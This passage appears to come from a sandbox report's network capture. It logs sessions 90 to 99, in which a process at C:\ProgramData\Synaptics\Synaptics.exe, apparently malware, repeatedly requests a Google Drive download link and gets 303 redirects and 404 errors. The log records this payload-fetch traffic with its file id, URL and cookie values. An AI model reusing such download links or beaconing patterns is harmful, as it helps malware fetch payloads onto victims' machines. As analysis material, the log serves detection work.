                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VU8fUrJKrYNV-3eWyVY-CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            90  192.168.2.9  50099  216.58.206.65  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:05 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7jZa1BfZmaTC5U-tAJGwGlgQaWY8DergKbINa8kjWUJiXvE803Ugx1Od6ugeazz7aabIfXW5U
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i1Bum3kP3wuV_e2eRmaSag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:05 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:05 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="-Pz7N53Zzo9lVNyOuWV1ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:05 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            91 | 192.168.2.9 | 50115 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:06 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-U8yxiBJ4KY2ONv_DeBjABA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            92 | 192.168.2.9 | 50116 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:06 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--j0ca2DqfonD6okOo7MSpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            93 | 192.168.2.9 | 50124 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:07 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_LOsx8t-hGksMlmnISrZvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            94 | 192.168.2.9 | 50123 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:07 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:08 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6elcOMJZf7ETZffwtj9wZrkwrp9j_eOAAu8mNnfuBkDuuqPj8axttKT8N4_P6pK7Ir
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-OHCt6I374bH0sb6puiQDKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:08 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:08 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="6TOH9EHPlNP0MgaCgoUCcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:08 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            95 | 192.168.2.9 | 50125 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:07 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Pcdp4q-b4uXoUm0tK-KdhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            96 | 192.168.2.9 | 50126 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:07 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:08 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC59YiJkwpSSoN_DgMY1p74RRrKNpPG42CIsSGPx0q4uNd41PRYN11qDBuxgU7ZKbGyCxjztYQw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GTHoLr2DcQnulqwmmfWh8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:08 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:08 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="F_DdKjanoJGjTE-0FVmgMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:08 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            97 | 192.168.2.9 | 50133 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:08 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:08 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-eeCod3xKWt8EDT_JuGDajA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            98 | 192.168.2.9 | 50134 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:08 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:08 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-jXoG5cpWJmB7ofUqFCoKTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            99 | 192.168.2.9 | 50135 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:08 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4FGPAjsNOT0cgQ36GABnFN4Kt5iNZ4MnNxEzA-kpg9xENbPVCnMOJ_xtuPNX0-gFnEsdWVFOo
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:09 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-nxYGPefF9XjUiNOiikIOqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
